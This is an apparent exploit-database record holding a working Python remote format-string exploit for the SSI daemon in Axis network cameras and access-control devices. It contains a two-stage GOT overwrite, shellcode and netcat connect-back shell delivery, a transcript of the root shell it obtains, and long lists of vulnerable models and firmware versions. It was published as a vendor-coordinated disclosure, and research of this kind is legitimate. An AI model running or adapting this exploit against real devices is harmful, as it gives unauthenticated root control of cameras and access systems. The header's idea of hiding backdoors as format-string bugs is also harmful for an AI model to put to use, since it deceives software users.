verbose:\r\n#\t\t\tprint \"[Verbose] Calculated GOTint:\",GOTint,\"Calculated FirstWhat:\",FirstWhat,\"Calculated SecondWhat:\",SecondWhat\r\n\t\r\n\telse:\r\n\t\tprint \"[!] NCSH missing, exiting\"\r\n\t\tsys.exit(1)\r\n#\r\n# Let's start the exploiting procedure\r\n#\r\n\r\n#\r\n# Stage one\r\n#\r\n\tif NCSH1 or NCSH2:\r\n\r\n\t\t# \"New Style\" needs to make the exploit in two stages\r\n\t\tif NCSH2:\r\n\t\t\tFMScode = do_FMS(rhost,verbose)\r\n\t\t\t# Writing 'FirstWhere' and 'SecondWhere'\r\n\t\t\t# 1st request\r\n\t\t\tFMScode.AddADDR(GOTint) # Run up to free() GOT address\r\n\t\t\t#\r\n\t\t\t# 1st and 2nd \"Write-Where\"\r\n\t\t\tFMScode.AddDirectParameterN(POP1)\t# Write 1st Where\r\n\t\t\tFMScode.Add(\"XX\")\t\t\t# Jump up two bytes for next address\r\n\t\t\tFMScode.AddDirectParameterN(POP2)\t# Write 2nd Where\r\n\t\t\tFMSdata = FMScode.FMSbuild()\r\n\t\telse:\r\n\t\t\tFMSdata = \"\"\r\n\r\n\t\tprint \"[>] StG_1: Preparing netcat connect back shell to address:\",'0x{:08x}'.format(BSShex),\"(%d bytes)\" % (len(FMSdata))\r\n\telse:\r\n\t\tprint \"[>] StG_1: Sending and decoding shellcode to address:\",'0x{:08x}'.format(BSShex),\"(%d bytes)\" % (len(FMSdata))\r\n\r\n\t# Inject our encoded shellcode to be decoded in MIPS/CRISv32/ARM\r\n\t# Actually, any valid and public readable .shtml file will work...\r\n\t# (One of the two below seems always to be usable)\r\n\t#\r\n\t# For NCSH1 shell, we only check if the remote file are readable, for usage in Stage two\r\n\t# For NCSH2, 1st and 2nd (Write-Where) FMS comes here, and calculations start after '=' in the url\r\n\t#\r\n\ttry:\r\n\t\ttarget_url = \"/httpDisabled.shtml?user_agent=\"\r\n\t\tif noexploit:\r\n\t\t\ttarget_url2 = target_url\r\n\t\telse:\r\n\t\t\ttarget_url2 = \"/httpDisabled.shtml?&http_user=\"\r\n\r\n\t\tif NCSH2:\r\n\t\t\thtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell\r\n\t\telse:\r\n\t\t\thtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)\r\n\texcept urllib2.HTTPError as e:\r\n\t\tif e.code == 404:\r\n\t\t\tprint \"[<] Error\",e.code,e.reason\r\n\t\t\ttarget_url = \"/view/viewer_index.shtml?user_agent=\"\r\n\t\t\tif noexploit:\r\n\t\t\t\ttarget_url2 = target_url\r\n\t\t\telse:\r\n\t\t\t\ttarget_url2 = \"/view/viewer_index.shtml?&http_user=\"\r\n\t\t\tprint \"[>] Using alternative target shtml\"\r\n\t\t\tif NCSH2:\r\n\t\t\t\thtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell\r\n\t\t\telse:\r\n\t\t\t\thtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)\r\n\texcept Exception as e:\r\n\t\tif not NCSH2:\r\n\t\t\tprint \"[!] Shellcode delivery failed:\",str(e)\r\n\t\t\tsys.exit(1)\r\n#\r\n# Stage two\r\n#\r\n\r\n#\r\n# Building and sending the FMS code to the target\r\n#\r\n\tprint \"[i] Building the FMS code...\"\r\n\r\n\tFMScode = do_FMS(rhost,verbose)\r\n\r\n\t# This is an 'One-Write-Where-And-What' for FMS\r\n\t#\r\n\t# Stack Example:\r\n\t#\r\n\t# Stack content\t|\tStack address (ASLR)\r\n\t#\r\n\t# 0x0\t\t|\t@0x7e818dbc -> [POP1's]\r\n\t# 0x0\t\t|\t@0x7e818dc0 -> [free () GOT address]\r\n\t# 0x7e818dd0\t|\t@0x7e818dc4>>>>>+ \"Write-Where\" (%n)\r\n\t# 0x76f41fb8\t|\t@0x7e818dc8 | -> [POP2's]\r\n\t# 0x76f3d70c\t|\t@0x7e818dcc | -> [BSS shell code address]\r\n\t# 0x76f55ab8\t|\t@0x7e818dd0<<<<<+ \"Write-What\" (%n)\r\n\t# 0x1\t\t|\t@0x7e818dd4\r\n\t#\r\n\tif not NCSH1 and not NCSH2:\r\n\t\tFMScode.AddPOP(POP1)\t\t# 1st serie of 'Old Style' POP's \r\n\t\tFMScode.AddADDR(GOTint)\t\t# GOT Address\r\n\t\tFMScode.AddWRITEn(1)\t\t# 4 bytes Write-Where\r\n#\t\tFMScode.AddWRITElln(1)\t\t# Easier to locate while debugging as this will write double word (0x00000000004xxxxx)\r\n\r\n\t\tFMScode.AddPOP(POP2)\t\t# 2nd serie of 'Old Style' POP's\r\n\t\tFMScode.AddADDR(BSSint)\t\t# BSS shellcode address\r\n\t\tFMScode.AddWRITEn(1)\t\t# 4 bytes Write-What\r\n#\t\tFMScode.AddWRITElln(1)\t\t# Easier to locate while debugging as this will write double word (0x00000000004xxxxx)\r\n\r\n\t# End of 'One-Write-Where-And-What'\r\n\r\n\r\n\t# This is an 'Two-Write-Where-And-What' for FMS\r\n\t#\r\n\t# Netcat shell and FMS code in same request, we will jump to the SSI function <!--#exec cmd=\"xxx\" -->\r\n\t# We jump over all SSI tagging to end up directly where \"xxx\" will\r\n\t# be the string passed on to SSI exec function ('/bin/sh -c', pipe(), vfork() and execv())\r\n\t#\r\n\t# The Trick here is to write lower target address, that we will jump to when calling free(),\r\n\t# than the FMS has counted up to, by using Two-Write-Where-and-What with two writes to free() GOT\r\n\t# address with two LSB writes.\r\n\t#\r\n\telif NCSH2:\r\n\t\t#\r\n\t\t# Direct parameter access for FMS exploitation are really nice and easy to use.\r\n\t\t# However, we need to exploit in two stages with two requests.\r\n\t\t# (I was trying to avoid this \"Two-Stages\" so much as possibly in this exploit developement...)\r\n\t\t#\r\n\t\t# 1. Write \"Two-Write-Where\", where 2nd is two bytes higher than 1st (this allows us to write to MSB and LSB)\r\n\t\t# 2. Write with \"Two-Write-What\", where 1st (LSB) and 2nd (MSB) \"Write-Where\" pointing to.\r\n\t\t# \r\n\t\t# With \"new style\", we can write with POPs independently as we don't depended of same criteria as in \"NCSH1\",\r\n\t\t# we can use any regular \"Stack-to-Stack\" pointer as we can freely choose the POP-and-Write.\r\n\t\t# [Note the POP1/POP2 (low-high) vs POP3/POP4 (high-low) difference.]\r\n\t\t#\r\n\t\t# Stack Example:\r\n\t\t#\r\n\t\t# Stack content\t|\tStack address (ASLR)\r\n\t\t#\r\n\t\t# 0x7e818dd0\t|\t@0x7e818dc4>>>>>+ 1st \"Write-Where\" [@Stage One]\r\n\t\t# 0x76f41fb8\t|\t@0x7e818dc8 |\r\n\t\t# 0x76f3d70c\t|\t@0x7e818dcc |\r\n\t\t# 0x76f55ab8\t|\t@0x7e818dd0<<<<<+ 1st \"Write-What\" [@Stage Two]\r\n\t\t# 0x1\t\t|\t@0x7e818dd4\r\n\t\t# [....]\r\n\t\t# 0x1c154\t|\t@0x7e818e10\r\n\t\t# 0x7e818e20\t|\t@0x7e818e14>>>>>+ 2nd \"Write-Where\" [@Stage One]\r\n\t\t# 0x76f41fb8\t|\t@0x7e818e18 |\r\n\t\t# 0x76f3d70c\t|\t@0x7e818e1c |\r\n\t\t# 0x76f55758\t|\t@0x7e818e20<<<<<+ 2nd \"Write-What\" [@Stage Two]\r\n\t\t# 0x1\t\t|\t@0x7e818e24\r\n\t\t#\r\n\r\n\t\tFMScode.Add(shell)\r\n\r\n\t\t#\r\n\t\t# 1st and 2nd \"Write-Where\" already done in stage one\r\n\t\t#\r\n\t\t# 1st and 2nd \"Write-What\"\r\n\t\t#\r\n\t\tFMScode.AddADDR(GOTint + FirstWhat)\t# Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.\r\n\t\tFMScode.AddDirectParameterN(POP3)\t# Write with 4 bytes (we want to zero out in MSB)\r\n\t\tFMScode.AddADDR(SecondWhat + 3)\t\t# Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)\r\n\t\tFMScode.AddDirectParameterHHN(POP4)\t# Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation\r\n\r\n\telif NCSH1:\r\n\t\t# Could use direct argument addressing here, but I like to keep \"old style\" as well,\r\n\t\t# as it's another interesting concept.\r\n\t\t#\r\n\t\t# Two matching stack contents -> stack address in row w/o or max two POP's between,\r\n\t\t# is needed to write two bytes higher (MSB).\r\n\t\t# \r\n\t\t#\r\n\t\t# Stack Example:\r\n\t\t#\r\n\t\t# Stack Content\t|\t@Stack Address (ASLR)\r\n\t\t#\r\n\t\t# 0x9c\t\t|\t@7ef2fde8 -> [POP1's]\r\n\t\t# [....]\r\n\t\t# 0x1\t\t|\t@7ef2fdec -> [GOTint address]\r\n\t\t#------\r\n\t\t# 0x7ef2fe84\t|\t@7ef2fdf0 >>>>>+ Write 'FirstWhere' (%n) [LSB]\r\n\t\t# -> 'XX' | two bytes (Can be one or two POP's as well, by using %2c or %1c%1c as POPer)\r\n\t\t# 0x7ef2fe8c\t|\t@7ef2fdf4 >>>>>>>>>+ Write 'SecondWhere' (%n) [MSB]\r\n\t\t# ------ | |\r\n\t\t# [....] -> [POP3's] | |\r\n\t\t# 0x7fb99dc\t|\t@7ef2fe7c | |\r\n\t\t# 0x7ef2fe84\t|\t@7ef2fe80 | | [Count up to 0x2XXXX]\r\n\t\t# 0x7ef2ff6a\t|\t@7ef2fe84 <<<<<+ | Write 'XXXX' 'FirstWhat' (%n) (0x0002XXXX))\r\n\t\t# -> [POP4's] |\r\n\t\t# (nil)\t\t|\t@7ef2fe88 | [Count up to 0x20300]\r\n\t\t# 0x7ef2ff74\t|\t@7ef2fe8c <<<<<<<<<+ Write 'ZZ' 'SecondWhat' (%hhn) (0x00ZZXXXX)\r\n\r\n\t\tFMScode.Add(shell)\r\n\r\n\t\t# Write FirstWhere for 'FirstWhat'\r\n\t\tFMScode.AddPOP(POP1)\r\n\t\tFMScode.AddADDR(GOTint) # Run up to free() GOT address\r\n\t\tFMScode.AddWRITEn(1)\r\n\r\n\t\t# Write SecondWhere for 'SecondWhat'\r\n\t\t#\r\n\t\t# This is special POP with 1 byte, we can maximum POP 2!\r\n\t\t#\r\n\t\t# This POP sequence is actually no longer used in this part of exploit, was developed to meet the requirement\r\n\t\t# for exploitation of 5.2.x and 5.40.x, as there needed to be one POP with maximum of two bytes.\r\n\t\t# Kept as reference as we now using direct parameter access AKA 'New Style\" for 5.2x/5.4x\r\n\t\t#\r\n\t\tif POP2 != 0:\r\n\t\t\t# We only want to write 'SecondWhat' two bytes higher at free() GOT\r\n\t\t\tif POP2 > 2:\r\n\t\t\t\tprint \"POP2 can't be greater than two!\"\r\n\t\t\t\tsys.exit(1)\r\n\t\t\tif POP2 == 1:\r\n\t\t\t\tFMScode.Add(\"%2c\")\r\n\t\t\telse:\r\n\t\t\t\tFMScode.Add(\"%1c%1c\")\r\n\t\telse:\r\n\t\t\tFMScode.Add(\"XX\")\r\n\t\tFMScode.AddWRITEn(1)\r\n\r\n\t\t# Write FirstWhat pointed by FirstWhere\r\n\t\tFMScode.AddPOP(POP3)\t\t# Old Style POP's\r\n\t\tFMScode.AddADDR(FirstWhat)\t# Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.\r\n\t\tFMScode.AddWRITEn(1)\t\t# Write with 4 bytes (we want to zero out in MSB)\r\n\t\t\r\n\t\t# Write SecondWhat pointed by SecondWhere\r\n\t\tFMScode.AddPOP(POP4)\t\t# Old Style POP's\r\n\t\tFMScode.AddADDR(SecondWhat)\t# Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)\r\n\t\tFMScode.AddWRITEhhn(1)\t\t# Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation\r\n\r\n\telse:\r\n\t\tsys.exit(1)\r\n\r\n\tFMSdata = FMScode.FMSbuild()\r\n\r\n\tprint \"[>] StG_2: Writing shellcode address to free() GOT address:\",'0x{:08x}'.format(GOThex),\"(%d bytes)\" % (len(FMSdata))\r\n\r\n\t# FMS comes here, and calculations start after '=' in the url\r\n\ttry:\r\n\t\tif NCSH1 or NCSH2:\r\n\t\t\thtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell\r\n\t\telse:\r\n\t\t\thtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url2 + FMSdata) # MIPS/CRIS shellcode\r\n\texcept urllib2.HTTPError as e:\r\n\t\tprint \"[!] Payload delivery failed:\",str(e)\r\n\t\tsys.exit(1)\r\n\texcept Exception as e:\r\n\t\t# 1st string returned by HTTP mode, 2nd by HTTPS mode\r\n\t\tif str(e) == \"timed out\" or str(e) == \"('The read operation timed out',)\":\r\n\t\t\tprint \"[i] Timeout! Payload delivered sucessfully!\"\r\n\t\telse:\r\n\t\t\tprint \"[!] Payload delivery failed:\",str(e)\r\n\t\t\tsys.exit(1)\r\n\r\n\tif noexploit:\r\n\t\tprint \"\\n[*] Not exploiting, no shell...\\n\"\r\n\telse:\r\n\t\tprint \"\\n[*] All done, enjoy the shell...\\n\"\r\n\r\n#\r\n# [EOF]\r\n#\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40125/"}], "packetstorm": [{"lastseen": "2016-11-03T10:24:14", "bulletinFamily": "exploit", "description": "", "modified": "2016-07-18T00:00:00", "published": "2016-07-18T00:00:00", "href": "https://packetstormsecurity.com/files/137941/Axis-Communications-MPQT-PACS-SSI-Remote-Format-String-Code-Execution.html", "id": "PACKETSTORM:137941", "type": "packetstorm", "title": "Axis Communications MPQT/PACS SSI Remote Format String / Code Execution", "sourceData": "` \n#!/usr/bin/env python2.7 \n# \n# [SOF] \n# \n# [Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon \n# Research and development by bashis <mcw noemail eu> 2016 \n# \n# This format string vulnerability has following characteristic: \n# - Heap Based (Exploiting string located on the heap) \n# - Blind Attack (No output the remote attacker)(*) \n# - Remotly exploitable (As anonymous, no credentials needed) \n# \n# (*) Not so 'Blind' after all, since the needed addresses can be predicted by statistic. \n# \n# This exploit has following characteristic: \n# - Multiple architecture exploit (MIPS/CRISv32/ARM) [From version 5.20.x] \n# - Modifying LHOST/LPORT in shellcode on the fly \n# - Manual exploiting of remote targets \n# - Simple HTTPS support \n# - Basic Authorization support (not needed for this exploit) \n# - FMS dictionary and predicted addresses for GOT free() / BSS / Netcat shellcode \n# - Multiple shellcodes (ARM, CRISv32, MIPS and Netcat PIPE shell) \n# - Exploiting with MIPS, CRISv32 and ARM shellcode will give shell as root \n# - Exploiting with ARM Netcat PIPE shell give normally shell as Anonymous (5.2x and 5.4x give shell as root) \n# - Multiple FMS exploit techniques \n# - \"One-Write-Where-And-What\" for MIPS and CRISv32 \n# Using \"Old Style\" POP's \n# Classic exploit using: Count to free() GOT, write shellcode address, jump to shellcode on free() call \n# Shellcode loaded in memory by sending shellcode URL encoded, that SSI daemon decodes and keeps in memory. \n# - \"Two-Write-Where-And-What\" for ARM \n# 1) \"Old Style\": Writing 1x LSB and 1x MSB by using offsets for GOT free() target address \n# 2) \"New Style\": ARM Arch's have both \"Old Style\" (>5.50.x) )POPs and \"New Style\" (<5.40.x) direct parameter access for POP/Write \n# [Big differnce in possibilities between \"Old Style\" and \"New Style\", pretty interesting actually] \n# - Another way to POP with \"Old Style\", to be able POPing with low as 1 byte (One byte with %1c instead of eight with %8x) \n# - Exploit is quite well documented \n# \n# Anyhow, \n# Everything started from this simple remote request: \n# \n# --- \n# $ echo -en \"GET /httpDisabled.shtml?&http_user=%p|%p HTTP/1.0\\n\\n\" | netcat 192.168.0.90 80 \n# HTTP/1.1 500 Server Error \n# Content-Type: text/html; charset=ISO-8859-1 \n# \n# <HTML><HEAD><TITLE>500 Server Error</TITLE></HEAD> \n# <BODY><H1>500 Server Error</H1> \n# The server encountered an internal error and could not complete your request. \n# </BODY></HTML> \n# --- \n# \n# Which gave this output in /var/log/messages on the remote device: \n# \n# --- \n# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:635: getpwnam() failed for user: 0x961f0|0x3ac04b10 \n# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:303: Failed to get authorization data. \n# --- \n# \n# Which resulted into an remote exploit for more than 200 unique Axis Communication MPQT/PACS products \n# \n# --- \n# $ netcat -vvlp 31337 \n# listening on [any] 31337 ... \n# 192.168.0.90: inverse host lookup failed: Unknown host \n# connect to [192.168.0.1] from (UNKNOWN) [192.168.0.90] 55738 \n# id \n# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel),51(viewer),52(operator),53(admin),54(system),55(ptz) \n# pwd \n# /usr/html \n# --- \n# \n# Some technical notes: \n# \n# 1. Direct addressing with %<argument>$%n is \"delayed\", and comes in force only after disconnect. \n# Old metod with POP's coming into force instantly \n# \n# 2. Argument \"0\" will be assigned (after using old POP metod and %n WRITE) the next address on stack after POP's) \n# - Would be interesting to investigate why. \n# \n# 3. Normal Apache badbytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20, 0x23, 0x26 \n# Goodbytes: 0x01-0x08, 0x0e-0x1f, 0x21-0x22, 0x24-0x25, 0x27-0xff \n# \n# 3.1 Normal Boa badbytes: 0x00-0x08, 0x0b-0x0c, 0x0e-0x19, 0x80-0xff \n# Goodbytes: 0x09, 0x0a, 0x0d, 0x20-0x7f \n# \n# 3.2 Apache and Boa, by using URL encoded shellcode as in this exploit: \n# Badbytes = None, Goodbytes = 0x00 - 0xff (Yay!) \n# \n# 4. Everything is randomized, except heap. \n# \n# 5. My initial attempts to use ROP's was not good, as I didn't want to create \n# one unique FMS key by testing each single firmware version, and using ROP with FMS \n# on heap seems pretty complicated as there is one jump availible, maximum two. \n# \n# 5.1 Classic GOT write for free() that will jump to shellcode, was the best technique in this case. \n# \n# 6. Encoded and Decoded shellcode located in .bss section. \n# 6.1 FMS excecuted on heap \n# \n# 7. Vulnerable MPQT/PACS architectures: CRISv32, MIPS and ARM \n# 7.1 ARM has nonexecutable stack flag bit set (>5.20.x) by default on their binaries/libs, \n# so execute shellcode on heap/stack may be impossible. \n# 7.2 ARM shellcode and exploit has been verified by setting executable stack flag bit on binaries, \n# and re-compile of the image. \n# 7.3 However, ARM is easily exploitable with netcat shell, that's using the builtin '/bin/sh -c' code to execute. \n# \n# 8. This exploit are pretty well documented, more details can be extracted by reading \n# the code and comments. \n# \n# MIPS ssid maps \n# 00400000-0040d000 r-xp 00000000 00:01 2272 /bin/ssid \n# 0041d000-0041e000 rw-p 0000d000 00:01 2272 /bin/ssid \n# 0041e000-00445000 rwxp 00000000 00:00 0 [heap] \n# \n# ARM ssid maps \n# 00008000-00014000 r-xp 00000000 00:01 2055 /bin/ssid \n# 0001c000-0001d000 rw-p 0000c000 00:01 2055 /bin/ssid \n# 0001d000-00044000 rw-p 00000000 00:00 0 [heap] \n# \n# Crisv32 ssid maps \n# 00080000-0008c000 r-xp 00000000 1f:03 115 /bin/ssid \n# 0008c000-0008e000 rw-p 0000a000 1f:03 115 /bin/ssid \n# 0008e000-000b6000 rwxp 0008e000 00:00 0 [heap] \n# \n# General notes: \n# \n# When the vul daemon process is exploited, and after popping root connect-back shell, \n# the main process are usally restarted by respawnd, after the shell have spawned and taken over the parent process, \n# when the main process are fully alive again, I can enjoy the shell, and everybody else can \n# enjoy of the camera - that should make all of us happy ;) \n# During exploiting, logs says almost nothing, only that the main process restarted. \n# Note: Not true with ARM Netcat PIPE shell (as the code will vfork() and wait until child exits) \n# \n# '&http_user=' is the vuln tag, and the FMS will be excecuted when it will try to do vsyslog(), \n# after ssid cannot verify the user, free() are the closest function to be called after \n# vsyslog(), needed and perfect to use for jumping. \n# There is nothing shown for remote user, possible output of FMS are _only_ shown in log/console. \n# So we are pretty blind, but due to fixed FMS keys, that doesn't matter for us - it's predictable by statistics. \n# \n# Quite surprised to see so many different devices and under one major release version, \n# that's covered by one \"FMS key\". The \"FMS key\" are valid for all minor versions under the major version. \n# \n# This made me start thinking how brilliant and clever it would be to make an sophisticated door that's using format string as backdoor, \n# which generates no FMS output whatsoever to attacker and unlocked by a 'FMS key', instead of using hardcoded login/password. \n# \n# - No hardcoded login/password that could easily be found in firmware/software files. \n# - Extremely hard to find without local access (and find out what to trigger for opening the door) \n# - Nobody can not actually prove it is a sophisticated door for sure. \"It's just another bug.. sorry! - here is the fixed version.\" \n# (Only to close this door, and open another door, somewhere else, in any binary - and try make it harder to find) \n# \n# Note: \n# I don't say that Axis Communication has made this hidden format string by this purpose. \n# I can only believe it was a really stupid mistake from Axis side, after I have seen one screen-dump of the CVS changelog of SSI Daemon, \n# and another screen-dump with the change made late 2009, from non-vulnerable to vulnerable, in the affected code of logerr(). \n# \n# Vulnerable and exploitable products \n# \n# A1001, A8004-VE, A9188, C3003, F34, F41, F44, M1124, M1124-E, M1125, M1125-E, M1145, M1145-L, M3006, \n# M3007, M3026, M3027, M3037, M7010, M7011, M7014, M7016, P1125, P1353, P1354, P1355, P1357, P1364, \n# P1365, P1405, P1405-E, P1405-LE, P1425-E, P1425-LE, P1427, P1427-E, P1435, P3214, P3214-V, P3215, \n# P3215-V, P3224, P3224-LVE, P3225-LV, P3353, P3354, P3363, P3364, P3364-L, P3365, P3367, P3384, \n# P3707-PE, P3904, P3904-R, P3905, P3915-R, P5414-E, P5415-E, P5514, P5514-E, P5515, P5515-E, P5624, \n# P5624-E, P5635-E, P7210, P7214, P7216, P7224, P8535, Q1602, Q1604, Q1614, Q1615, Q1635, Q1635-E, \n# Q1765-LE, Q1765-LE-PT, Q1775, Q1931-E, Q1931-E-PT, Q1932-E, Q1932-E-PT, Q1941-E, Q2901-E, Q2901-E-PT, \n# Q3504, Q3505, Q6000-E, Q6042, Q6042-C, Q6042-E, Q6042-S, Q6044, Q6044-C, Q6044-E, Q6044-S, Q6045, \n# Q6045-C, Q6045-E, Q6045-S, Q6114-E, Q6115-E, Q7411, Q7424-R, Q7436, Q8414, Q8414-LVS, Q8631-E, Q8632-E, \n# Q8665-E, Q8665-LE, V5914, V5915, M1054, M1103, M1104, M1113, M1114, M2014-E, M3014, M3113, M3114, M3203, \n# M3204, M5013, M5014, M7001, P12/M20, P1204, P1214, P1214-E, P1224-E, P1343, P1344, P1346, P1347, P2014-E, \n# P3301, P3304, P3343, P3344, P3346, P3346-E, P5512, P5512-E, P5522, P5522-E, P5532, P5532-E, P5534, P5534-E, \n# P5544, P8221, P8513, P8514, P8524, Q1755, Q1910, Q1921, Q1922, Q6032, Q6032-C, Q6032-E, Q6034, Q6034-C, \n# Q6034-E, Q6035, Q6035-C, Q6035-E, Q7401, Q7404, Q7406, Q7414, Q8721-E, Q8722-E, C, M1004-W, M1011, M1011-W, \n# M1013, M1014, M1025, M1031-W, M1033-W, M1034-W, M1143-L, M1144-L, M3004, M3005, M3011, M3024, M3024-L, \n# M3025, M3044-V, M3045-V, M3046-V, P1311, P1428-E, P7701, Q3709-PVE, Q3708-PVE, Q6128-E... and more \n# \n# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt \n# \n# Firmware versions vulnerable to the SSI FMS exploit \n# \n# ('V.Vx' == The FMS key used in this exploit) \n# \n# Firmware Introduced CRISv32 MIPS ARM (no exec heap from >5.20.x) \n# 5.00.x 2008 - - no \n# 5.01.x 2008 no - no \n# 5.02.x 2008 no - - \n# 5.05.x 2009 no - - \n# 5.06.x 2009 no - - \n# 5.07.x 2009 no - no \n# 5.08.x 2010 no - - \n# 5.09.x 2010 no - - \n# 5.10.x 2009 no - - \n# 5.11.x 2010 no - - \n# 5.12.x 2010 no - - \n# 5.15.x 2010 no - - \n# 5.16.x 2010 no - - \n# 5.20.x 2010-2011 5.2x - 5.2x \n# 5.21.x 2011 5.2x - 5.2x \n# 5.22.x 2011 5.2x - - \n# 5.25.x 2011 5.2x - - \n# 5.40.x 2011 5.4x 5.4x 5.4x \n# 5.41.x 2012 5.4x - - \n# 5.50.x 2013 5.5x 5.5x 5.4x \n# 5.51.x 2013 - 5.4x - \n# 5.55.x 2013 - 5.5x 5.5x \n# 5.60.x 2014 - 5.6x 5.6x \n# 5.65.x 2014-2015 - 5.6x - \n# 5.70.x 2015 - 5.7x - \n# 5.75.x 2015 - 5.7x 5.7x \n# 5.80.x 2015 - 5.8x 5.8x \n# 5.81.x 2015 - 5.8x - \n# 5.85.x 2015 - 5.8x 5.8x \n# 5.90.x 2015 - 5.9x - \n# 5.95.x 2016 - 5.9x 5.8x \n# 6.10.x 2016 - 6.1x - \n# 6.15.x 2016 - - 6.1x \n# 6.20.x 2016 - 6.2x - \n# \n# Vendor URL's of still supported and affected products \n# \n# http://www.axis.com/global/en/products/access-control \n# http://www.axis.com/global/en/products/video-encoders \n# http://www.axis.com/global/en/products/network-cameras \n# http://www.axis.com/global/en/products/audio \n# \n# Axis Product Security \n# \n# product-security@axis.com \n# http://www.axis.com/global/en/support/product-security \n# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt \n# http://www.axis.com/global/en/support/faq/FAQ116268 \n# \n# Timetable \n# \n# - Research and Development: 06/01/2016 - 01/06/2016 \n# - Sent vulnerability details to vendor: 05/06/2016 \n# - Vendor responce received: 06/06/2016 \n# - Vendor ACK of findings received: 07/06/2016 \n# - Vendor sent verification image: 13/06/2016 \n# - Confirmed that exploit do not work after vendors correction: 13/06/2016 \n# - Vendor informed about their service release(s): 29/06/2016 \n# - Sent vendor a copy of the (this) PoC exploit: 29/06/2016 \n# - Full Disclosure: 18/07/2016 \n# \n# Quote of the day: Never say \"whoops! :o\", always say \"Ah, still interesting! :>\" \n# \n# Have a nice day \n# /bashis \n# \n##################################################################################### \n \nimport sys \nimport string \nimport socket \nimport time \nimport argparse \nimport urllib, urllib2, httplib \nimport base64 \nimport ssl \nimport re \n \n \nclass do_FMS: \n \n# POP = \"%8x\" # Old style POP's with 8 bytes per POP \nPOP = \"%1c\" # Old style POP's with 1 byte per POP \nWRITElln = \"%lln\" # Write 8 bytes \nWRITEn = \"%n\" # Write 4 bytes \nWRITEhn = \"%hn\" # Write 2 bytes \nWRITEhhn = \"%hhn\" # Write 1 byte \n \ndef __init__(self,targetIP,verbose): \nself.targetIP = targetIP \nself.verbose = verbose \nself.fmscode = \"\" \n \n# Mostly used internally in this function \ndef Add(self, data): \nself.fmscode += data \n \n# 'New Style' Double word (8 bytes) \ndef AddDirectParameterLLN(self, ADDR): \nself.Add('%') \nself.Add(str(ADDR)) \nself.Add('$lln') \n \n# 'New Style' Word (4 bytes) \ndef AddDirectParameterN(self, ADDR): \nself.Add('%') \nself.Add(str(ADDR)) \nself.Add('$n') \n \n# 'New Style' Half word (2 bytes) \ndef AddDirectParameterHN(self, ADDR): \nself.Add('%') \nself.Add(str(ADDR)) \nself.Add('$hn') \n \n# 'New Style' One Byte (1 byte) \ndef AddDirectParameterHHN(self, ADDR): \nself.Add('%') \nself.Add(str(ADDR)) \nself.Add('$hhn') \n \n# Addressing \ndef AddADDR(self, ADDR): \nself.Add('%') \nself.Add(str(ADDR)) \nself.Add('u') \n \n# 'Old Style' POP \ndef AddPOP(self, size): \nif size != 0: \nself.Add(self.POP * size) \n \n# Normally only one will be sent, multiple is good to quick-check for any FMS \n# \n# 'Old Style' Double word (8 bytes) \ndef AddWRITElln(self, size): \nself.Add(self.WRITElln * size) \n \n# 'Old Style' Word (4 bytes) \ndef AddWRITEn(self, size): \nself.Add(self.WRITEn * size) \n \n# 'Old Style' Half word (2 bytes) \ndef AddWRITEhn(self, size): \nself.Add(self.WRITEhn * size) \n \n# 'Old Style' One byte (1 byte) \ndef AddWRITEhhn(self, size): \nself.Add(self.WRITEhhn * size) \n \n# Return the whole FMS string \ndef FMSbuild(self): \nreturn self.fmscode \n \nclass HTTPconnect: \n \ndef __init__(self, host, proto, verbose, creds, noexploit): \nself.host = host \nself.proto = proto \nself.verbose = verbose \nself.credentials = creds \nself.noexploit = noexploit \n \n# Netcat remote connectback shell needs to have raw HTTP connection as we using special characters as '\\t','$','`' etc.. \ndef RAW(self, uri): \n# Connect-timeout in seconds \ntimeout = 5 \nsocket.setdefaulttimeout(timeout) \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) \ntmp = self.host.split(':') \nHOST = tmp[0] \nPORT = int(tmp[1]) \nif self.verbose: \nprint \"[Verbose] Sending to:\", HOST \nprint \"[Verbose] Port:\", PORT \nprint \"[Verbose] URI:\",uri \ns.connect((HOST, PORT)) \ns.send(\"GET %s HTTP/1.0\\r\\n\\r\\n\" % uri) \nhtml = (s.recv(4096)) # We really do not care whats coming back \n# if html: \n# print \"[i] Received:\",html \ns.shutdown(3) \ns.close() \nreturn html \n \n \ndef Send(self, uri): \n \n# The SSI daemon are looking for this, and opens a new FD (5), but this does'nt actually \n# matter for the functionality of this exploit, only for future references. \nheaders = { \n'User-Agent' : 'MSIE', \n} \n \n# Connect-timeout in seconds \ntimeout = 5 \nsocket.setdefaulttimeout(timeout) \n \nurl = '%s://%s%s' % (self.proto, self.host, uri) \n \nif self.verbose: \nprint \"[Verbose] Sending:\", url \n \nif self.proto == 'https': \nif hasattr(ssl, '_create_unverified_context'): \nprint \"[i] Creating SSL Default Context\" \nssl._create_default_https_context = ssl._create_unverified_context \n \nif self.credentials: \nBasic_Auth = self.credentials.split(':') \nif self.verbose: \nprint \"[Verbose] User:\",Basic_Auth[0],\"Password:\",Basic_Auth[1] \ntry: 